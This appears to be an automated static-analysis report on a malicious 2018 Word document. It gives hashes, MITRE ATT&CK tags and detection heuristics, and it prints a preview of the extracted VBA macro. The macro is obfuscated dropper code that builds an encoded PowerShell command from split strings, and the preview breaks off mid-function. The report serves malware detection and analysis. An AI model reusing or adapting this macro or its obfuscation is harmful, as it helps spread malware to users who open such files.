Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6e2d27297793d1d9…

MALICIOUS

Office (OLE)

Size: 89.2 KB
Created: 2018-06-20 21:40:00
Authoring application: Microsoft Office Word
First seen: 2018-07-14
MD5: 6de27399347a8e7a5be3049d18ccb044
SHA-1: f226a85dd21a735b139bc4f89fce79dc3e58ef5c
SHA-256: 6e2d27297793d1d94e000d3c377e3feca848b54a068b73915b33d806175b9e07
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro utilizes obfuscated string concatenation to construct and execute a PowerShell command, likely to download and run a second-stage payload. The presence of the Shell() call and the auto-execution marker 'AutoOpen' strongly indicate malicious intent.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6585318-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6585318-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11974 bytes
SHA-256: 51ae9d730c85f446fac9ab2e2772add98a5790ac7a14759bdbc9a8d45278fb2d
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "SrOiZowOoiT"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "zvcMJrSCtu"
Function RfTCSqqOTzf()
On Error Resume Next
WVJKY = 98987
jlTtHk = CByte(kKAMhz)
QzcZJ = cnTaZ
vvmNWR = CDate(45203)
wCiYL = 73277
zTVWB = CDate(bSIfav + Sin(36529 + 4110) * 11133 * CInt(72442))
ukwNiB = "OwerSHell " + Chr(34) + "$( sEt-i" + "tEm  'vaRIaBLe:" + "OF" + "S' '')" + Chr(34) + " +[STRIN" + "g]( '2" + "6b95"
XliOIr = 85326
HDPtqB = CByte(GRuvp)
DhjVov = dQwqi
tiiCC = CDate(92474)
ALFvj = 8616
dsXGQ = CDate(NThlU + Sin(64183 + 33526) * 57467 * CInt(40615))
IwljpjwOnX = ">72%" + "81~121@" + "87w3" + "0i3@30o"
fIdjn = 78170
faNXi = CByte(ziVSa)
DYMFF = qnUIX
hbtqT = CDate(30550)
mSKTDX = 84200
QhZOlk = CDate(GEvDA + Sin(65043 + 99325) * 44072 * CInt(70679))
PBMzBBG = "80>91i73F19>81{" + "92i84~9" + "1F9" + "3~74%30{76o95>8" + "0%90~81>83i5~26" + "b1" + "10%111>10"
LcmFS = 86555
RStXKq = CByte(muDdLL)
wfPPZM = WkLLCz
bQbCSS = CDate(56149)
GYmPwf = 22708
jibffr = CDate(lHnMmZ + Sin(39099 + 53543) * 71224 * CInt(24721))
wBnGEf = "7i119w122i1" + "19%30@3i30w80F9" + "1F73b1" + "9%81w92>84b91w9" + "3o7" + "4F30" + "@109o71o7" + "7@74{91%83i16@"
LIwqzZ = 19015
oqpWW = CByte(dQEPzI)
dEIuV = jjDrv
PaEnl = CDate(61331)
sCNtIZ = 54007
iMohk = CDate(THTjMG + Sin(24377 + 56153) * 43178 * CInt(38604))
UduWEGZ = "112>91i74F16" + "o105F91F92{12" + "5~82@87%91i80>7" + "4>5F26F104%1" + "21w1" + "14"
HlYdW = 95064
Dsvit = CByte(qJhXG)
nHNCaC = jWCMat
BIBhF = CDate(45894)
DSGwW = 77012
ajwMD = CDate(uSFsf + Sin(58502 + 47200) * 46675 * CInt(81479))
zwFTiVz = "@1" + "12%1" + "20{116F30b3b" + "30{25~86" + "i74>74{78%4%1" + "7@17%7" + "3{73o73~16@93~8" + "1o80@"
jrZwo = 70321
BthoL = CByte(OZsVwY)
ONrda = zwAmqq
RpBrUY = CDate(99489)
iPkcpU = 11181
MYcBCY = CDate(PnDmR + Sin(53337 + 59274) * 56378 * CInt(39359))
wFFnomiCdtj = "89{80w8" + "9{86w91w72F87b9" + "1i80>74" + "{86%81o"
jzpIO = CDate(FGjTVT + Sin(71106 + 83948) * 78352 * CInt(98849))
CBmPZE = CDate(47528)
JQZEcR = hbjHU
LnMhS = CByte(LILmn)
JGHKFR = 24363
kAtqaM = 95864
VmUiIr = "80o89%16F93F81" + "o83w17@7" + "0~7~86b8" + "8~14" + "o120~" + "72w123"
RfTCSqqOTzf = ukwNiB + IwljpjwOnX + PBMzBBG + wBnGEf + UduWEGZ + zwFTiVz + wFFnomiCdtj + VmUiIr
End Function
Function RESXJtiI()
On Error Resume Next
auRcB = CDate(qjZAEZ + Sin(74159 + 24577) * 65250 * CInt(47017))
bnCwmr = CDate(66945)
hGUMtY = iMcfi
UtLNm = CByte(QozRDh)
SjzEY = 83542
RjIwu = 97700
tSPXGiRXX = "{17o126" + ">86{74o74" + "w7" + "8~4>17o17~"
RpSji = CDate(wvvHU + Sin(14586 + 43655) * 43652 * CInt(24889))
zpzLFY = CDate(66414)
ZAzNw = oOcwnv
HzOFdD = CByte(kOIjV)
klLZEZ = 32920
NzBib = 81913
aTuzsASsp = "74" + "%78i92%90~7" + "7w76F7" + "9@88F16%93>8"
hHTZuj = CDate(SDBDG + Sin(13433 + 52704) * 75470 * CInt(4699))
BEGjW = CDate(1835)
ZMTic = aNATHs
BLOYa = CByte(jlFaUb)
wWzuH = 79291
SYGHl = 87508
nQitA = "1b83%17{" + "90w" + "100>123w7" + "9w13w79" + "w108" + "~17w126i86" + "{74w74%78>4w17>"
zzptJZ = CDate(RuNtqC + Sin(97941 + 61187) * 46539 * CInt(87201))
LuMwZn = CDate(66311)
YLOYFj = zijicr
OUvOB = CByte(HKhCFN)
pduYRi = 8058
VsPVFU = 84206
EmkrFONwqT = "17i73o" + "73@73~16{77{87" + "b83~9" + "5o82{87" + "%89~86o74" + "F16>" + "93~81>83i17>" + "75o125i14>" + "15o74o1" + "11b122{120"
JjKSY = CDate(FzVlQV + Sin(17006 + 18234) * 34101 * CInt(39087))
vMjRW = CDate(98990)
aHiwco = wGhXzJ
MOoCjP = CByte(QauJN)
LsnoL = 44806
SLCjc = 8299
kwpzkPjomtW = "F17b12" + "6%86%74o74" + "~78w4%17>17%" + "89@76%"
JFcoQY = CDate(XUbhAz + Sin(15926 + 4276) * 63732 * CInt(89133))
RRhAM = CDate(31245)
UdErh = iVzMTc
oEAdso = CByte(OUVhuj)
dkKXv = 78347
jYjiw = 45721
qDYXdNVdo = "87" + ">88o88w" + "89>76o95%" + "88o88>16{8" + "0i91i74~17" + "i6>91b" + "14w71{87>1" + "3o" + "17@126%8"
dDJGi = CDate(iNrnz + Sin(75887 + 67
... (truncated)